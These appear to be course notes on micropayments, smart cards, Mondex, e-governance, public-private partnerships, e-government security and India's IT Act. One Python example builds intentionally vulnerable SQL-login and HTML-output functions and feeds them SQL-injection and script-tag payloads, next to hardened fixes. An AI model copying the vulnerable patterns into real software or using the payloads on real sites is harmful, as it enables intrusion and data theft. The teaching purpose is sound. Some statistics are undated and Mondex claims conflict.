- Handypay: payment via the mobile phone bill. The customer enters his or her mobile number and receives an SMS containing a TAN to confirm the payment.

- Ebank2pay: payment using online banking. The customer makes the transfer through his or her online banking access and confirms it with a TAN; after payment the customer receives access to the purchased product.

- Credit card: the customer enters card data and confirms the transaction. The transaction can optionally be carried out with 3-D Secure (Verified by Visa, MasterCard SecureCode).

- Direct debit: the customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment service that charges payments to the user's PayPal account and allows transactions of less than US$12. As of 2013 the service is offered in select currencies only.

Micropayment Uses

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. They may provide strong authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data: it can receive input, which is processed and delivered as output.

What is a Smart Card?

- Standard credit-card-sized, with a microchip embedded in it
- Two types: memory-only chips and microprocessor chips
- Can hold up to 32,000 bytes
- Newer smart cards have cryptographic co-processors that perform public-key and other encryption routines quickly
- In 1968 two German inventors patented the combination of a plastic card with a microchip

Construction of Smart Cards


Why Smart Cards?

- Improve the convenience and security of any transaction
- Provide tamper-resistant storage of user and account identity
- Provide vital components of system security
- Protect against a broad range of security threats

Advantages

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications

- Ticketless travel: Seoul bus system (4 million cards, 1 billion transactions since 1996); planned for the SF Bay Area system
- Authentication, ID
- Medical records
- E-cash
- Store loyalty programs
- Personal profiles
- Government
- Licenses
- Mall parking
- Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Features:

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet, telephone networks etc.
- Transaction records kept on the card
- Password protection and "lock card" functions
- Portable balance reader to check the balance
- Support for multiple currencies


ADVANTAGES

CONSUMER
- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT
- Reliable offline payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION
- Strengthened customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, on the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy?

Principles protected:
  o limits for collecting personal information
  o limits for using, disclosing and keeping personal information
  o keeping personal information accurate
  o safeguarding personal information

Limits for collecting personal information
  o loads from account
  o deposits into account
  o lost transactions

Limits for using, disclosing and keeping personal information
  o to safeguard deposits
  o to reimburse for non-performance

Keeping personal information accurate
  o load and unload are online
  o a rolling log of the last 10 transactions gives the exact spend and retailer name

Safeguarding personal information
  o firewalls in MULTOS between applications (ITSEC E6 designation)
  o transaction data passed to the retailer is deliberately limited
  o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use it to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology, and can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card can make card-to-card transfers, which is not possible with standard credit or debit cards. When a credit or debit card is used for a purchase, communication is required between the bank and the card. Mondex cards instead contain an embedded microprocessor with sophisticated encryption methods and tamper-resistant hardware designed to protect them from attackers. The ability to do offline transactions makes them less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are recorded in the card's microprocessor memory and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank's computer.

A significant disadvantage of Mondex is that transactions are not truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you cannot purchase a Mondex card without revealing your identity; each card has a unique identification number through which the owner can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card; losing a Mondex card is just like losing a wallet full of cash. With a credit card you are protected against any loss exceeding $50; no such protection is currently available with a Mondex smart card.

According to Mondex, the system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. After a number of transactions, overflow can occur because of the limited memory in the Mondex smart cards, meaning that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes its electronic payment system is secure, and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card comes down to a personal level of trust.
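The properties discussed above (offline card-to-card value transfer, a rolling log of about ten transactions, and the overflow that loses older records) can be seen in a small model. The Go program below is an added example and is not Mondex's protocol or code: Purse, ValueMsg, the HMAC tag with a constructed shared demoKey standing in for the card's real cryptographic authentication, and the LogSize of 10 are all this example's assumptions. It shows the invariants a stored-value card must keep even while offline: a transfer debits before it credits, a replayed value message is rejected, an altered amount fails authentication, and once the log is full the oldest entry is gone, which is exactly the audit gap the critics describe.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"errors"
	"fmt"
)

const LogSize = 10 // depth of the rolling transaction log described above

// demoKey stands in for the per-card key material; a real card keeps its
// key inside the chip and the real scheme uses public-key signatures.
var demoKey = []byte("constructed demo key, not a real card key")

// Entry is one line of the card's transaction log.
type Entry struct {
	Seq          uint32
	Counterparty string
	Cents        int64 // positive = received, negative = paid out
}

// ValueMsg is what the paying card hands the receiving card offline.
type ValueMsg struct {
	From, To string
	Cents    int64
	Seq      uint32
	Tag      []byte // MAC over the other fields
}

func tagOf(m ValueMsg) []byte {
	mac := hmac.New(sha256.New, demoKey)
	fmt.Fprintf(mac, "%s|%s|%d|%d", m.From, m.To, m.Cents, m.Seq)
	return mac.Sum(nil)
}

var (
	ErrInsufficient = errors.New("insufficient balance")
	ErrWrongPayee   = errors.New("value message addressed to another card")
	ErrBadTag       = errors.New("value message fails authentication")
	ErrReplay       = errors.New("value message replayed")
)

// Purse models a stored-value card: balance, a sequence counter, the
// highest sequence accepted from each sender, and a log that silently
// discards its oldest entry once LogSize entries are held.
type Purse struct {
	ID      string
	balance int64
	seq     uint32
	seen    map[string]uint32
	log     []Entry
}

func NewPurse(id string, cents int64) *Purse {
	return &Purse{ID: id, balance: cents, seen: map[string]uint32{}}
}

func (p *Purse) Balance() int64 { return p.balance }
func (p *Purse) Log() []Entry   { return p.log }

func (p *Purse) record(e Entry) {
	if len(p.log) == LogSize {
		p.log = p.log[1:] // overflow: this record is unrecoverable from the card
	}
	p.log = append(p.log, e)
}

// Send debits the payer before the message exists, so an interrupted
// transfer can lose value but never duplicate it.
func (p *Purse) Send(to string, cents int64) (ValueMsg, error) {
	if cents <= 0 || cents > p.balance {
		return ValueMsg{}, ErrInsufficient
	}
	p.seq++
	p.balance -= cents
	p.record(Entry{Seq: p.seq, Counterparty: to, Cents: -cents})
	m := ValueMsg{From: p.ID, To: to, Cents: cents, Seq: p.seq}
	m.Tag = tagOf(m)
	return m, nil
}

// Receive credits the card only for an authentic message addressed to it
// that carries a sequence number not yet seen from that sender.
func (p *Purse) Receive(m ValueMsg) error {
	if m.To != p.ID {
		return ErrWrongPayee
	}
	if !hmac.Equal(m.Tag, tagOf(m)) {
		return ErrBadTag
	}
	if m.Seq <= p.seen[m.From] {
		return ErrReplay
	}
	p.seen[m.From] = m.Seq
	p.seq++
	p.balance += m.Cents
	p.record(Entry{Seq: p.seq, Counterparty: m.From, Cents: m.Cents})
	return nil
}

func main() {
	a, b := NewPurse("card-A", 1000), NewPurse("card-B", 0)
	m, _ := a.Send("card-B", 250)
	fmt.Println("receive:", b.Receive(m), "replay:", b.Receive(m))
	for i := 0; i < 12; i++ {
		m, _ := a.Send("card-B", 1)
		b.Receive(m)
	}
	fmt.Printf("A=%d B=%d, B log keeps %d of %d transactions, oldest seq %d\n",
		a.Balance(), b.Balance(), len(b.Log()), b.seq, b.Log()[0].Seq)
}
```

Two things carry over to the real system. First, the "debit first" ordering in Send is what makes an interruption safe for the issuer (the payer may lose value, but value is never created); a lost message is the "lost transactions" case listed under Mondex's privacy principles. Second, everything that would let a bank reconstruct what happened lives in the on-card log, and that log forgets: after thirteen transactions card-B holds only the last ten, so any fraud detection that depends on the missing entries has nothing to work with.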

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of it. Different governments and organizations define the term to suit their own aims and objectives, and 'e-government' is sometimes used instead.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchanging information, communication and transactions, and integrating various stand-alone systems and services between government and citizen (G2C), government and business (G2B) and government and government (G2G), as well as the back-office processes and interactions within the entire government framework. Through e-governance, government services are made available to citizens in a convenient, efficient and transparent manner. The three main target groups in governance concepts are government, citizens and businesses/interest groups; in e-governance there are no distinct boundaries between them.

Generally four basic models are distinguished: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

The two terms are often treated as the same; there is, however, some difference between them. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a definition of e-governance is that it makes no provision for the governance of ICTs themselves. The governance of ICTs most probably requires a substantial increase in regulation and policy-making capability, with all the expertise and opinion-shaping processes among the various social stakeholders that this involves. So the perspective of e-governance is the use of technologies that both help with governing and have themselves to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India; United Telecoms Limited (UTL) is a major player in PPP-based e-governance projects in India, each involving a mammoth state-wide area network.

E-governance is the future many countries look forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for an individual have actually reached that individual. There should be an auto-response that supports this, whereby the government learns the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference from too many layers while delivering government services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information that empowers citizens, enable their participation in government, and enhance citizens' economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, which illustrates how applications from various departments can be integrated so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP can be legacy applications wrapped to suit the CORBA specifications, new Web applications, or even a database environment such as Oracle. Seamless interconnection, and thereby effective use of the entire e-Governance system, is possible if the middleware is designed to provide the necessary services: transactions, database management, messaging and naming.

Regarding security, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While these technologies carry weight, public key security with the Secure Sockets Layer (SSL) is what is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between the different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

Here Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction lies only within the sphere of government and can be horizontal, i.e. between different government agencies or between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies or between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

Here an interface is created between the government and citizens which enables citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves their quality on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where (e.g. a service centre, an unattended kiosk, or home or workplace) and how (e.g. Internet, fax, telephone, email, face to face). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to help the business community, the providers of goods and services, interact seamlessly with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, as in licensing, permits, procurement and revenue collection, or promotional and facilitative, as in trade, tourism and investment. These measures provide a congenial environment that lets businesses perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. ICT tools make these interactions fast and efficient on the one hand and raise the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) refers to the conducting of transactions between government bodies and businesses via the Internet.

Business to government (B2G) refers to professional dealings between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

- Agreement between Government and the Private Sector for the provision of a public good or service by the latter
- Generally, but not always, involving:
  - long-term contracts
  - user charges and/or payments flowing between the parties
  - shared investments, but mainly private
  - risk sharing by the parties
- Must be a partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

- Fiscal head room
- As a way of financing the project
- Separate policy and regulation from operations
- Make the good or service available
- Pay for performance and output
- Introduce competition, for and in the market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

- Shared goals
- Shared resources (time, money, expertise, people)
- Shared risks
- Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

- Crafting the Partnership
- Implementing the Partnership

Project Management: Six Distinct Phases

1. Genesis
   - What is the need?
   - What is driving the need (rationale): facility non-compliance, natural disaster, budget deficit?
   - Is there a need for a Public/Private Partnership?

2. Preliminary Project Definition
   - Feasibility: is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
   - Market research
   - Economic/financial analysis
   - Program, budget and schedule
   - Risk analysis

3. Plan and Test
   - Final project definition: what is the best way to complete the project?
   - Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
   - Master schedule/budget
   - Political climate
   - Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
   - How do you choose and contract with the best-value private partner?
   - What is the best delivery method: Design-Bid-Build, Design-Build, Finance-Design-Build?
   - What do current statutes allow?
   - Procurement approach: sole source, RFP, low bid
   - Risk allocation between public and private partners
   - Structuring of contract: risks and rewards

5. Implement
   - Environmental
   - Design
   - Permitting
   - Construction
   - Commissioning and administration

6. Operate
   - Startup
   - Monitoring
   - Assessment
   - Enhancement
   - Contract modifications
   - Contract renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency in public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been adequately addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

continually improve its control environment;

effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
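The two vulnerability classes named in the paragraph above are easiest to understand side by side with their fixes. The Python block below is an added example written for these notes; it is not code from the page's source or from any e-Government site. It builds a constructed in-memory SQLite user table and writes the same login query two ways: concatenated, where a password field containing a tautology matches every row, and parameterized, where the identical input matches nothing. It then shows the XSS counterpart: reflecting a display name into HTML unescaped versus escaping it with html.escape. The table, rows, names and inputs are all constructed for the demonstration.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed user store standing in for a portal's database.
    Passwords are kept in clear text only to keep the demo short; a real
    system stores password hashes, which does not change the injection point."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "pw-alice", "citizen"), ("bob", "pw-bob", "officer")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Query built by string concatenation: user input is parsed as SQL."""
    sql = ("SELECT name, role FROM users WHERE name = '" + name
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_hardened(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Parameterized query: the driver binds input as data, never as SQL text."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


def render_greeting_vulnerable(display_name: str) -> str:
    """Reflects input into HTML unescaped: the classic XSS sink."""
    return "<p>Welcome, " + display_name + "</p>"


def render_greeting_hardened(display_name: str) -> str:
    """Escapes <, >, &, ' and \" so the browser treats the input as text."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


def injection_demo() -> dict:
    """Runs both variants on constructed inputs and returns what each did."""
    conn = make_db()
    # Constructed inputs: a tautology in the password field and a script tag
    # in the display name. Neither value is taken from the page.
    tautology = "' OR '1'='1"
    markup = "<script>alert(1)</script>"
    return {
        "vulnerable_rows": len(login_vulnerable(conn, "alice", tautology)),
        "hardened_rows": len(login_hardened(conn, "alice", tautology)),
        "vulnerable_html": render_greeting_vulnerable(markup),
        "hardened_html": render_greeting_hardened(markup),
    }


if __name__ == "__main__":
    for key, value in injection_demo().items():
        print(key, "->", value)
```

With the tautology in the password field, the concatenated query's WHERE clause becomes name = 'alice' AND password = '' OR '1'='1', which is true for every row, so the vulnerable login returns both users while the parameterized one returns none. The hardened greeting renders the script tag as visible text instead of executable markup.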

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction, and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason.

The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on E-commerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the Intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures Access

Downloads, Copies or extracts any data, computer database or any information

Introduces or causes to be introduced any Virus or Contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, Deletes or Alters any Information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

any information that is grossly offensive or has menacing character; or

any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced. Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offenses and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment

65 | Tampering with computer source documents - Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means - Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because it addresses the issue of Cyber Security.

